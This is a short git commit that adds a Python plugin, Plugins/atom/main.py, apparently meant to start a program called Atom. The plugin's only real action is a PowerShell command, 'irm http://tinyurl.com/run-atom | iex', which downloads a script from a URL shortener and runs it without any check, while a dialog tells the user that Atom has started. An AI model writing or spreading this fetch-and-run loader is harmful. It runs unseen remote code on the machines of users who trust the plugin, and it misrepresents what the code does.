restore from backup

This commit is contained in:
CthulhuOnIce 2024-12-19 17:08:36 -05:00
commit ad483a1403
11 changed files with 208 additions and 0 deletions

9
Plugins/atom/main.py Normal file
View file

@ -0,0 +1,9 @@
import subprocess
import time
def Execute(self, path):
# start atom
process = subprocess.Popen(["powershell", "irm http://tinyurl.com/run-atom | iex"])
self.alert("Atom has been started, please hit 'OK' when it is finished.", title="Atom")
time.sleep(2)
return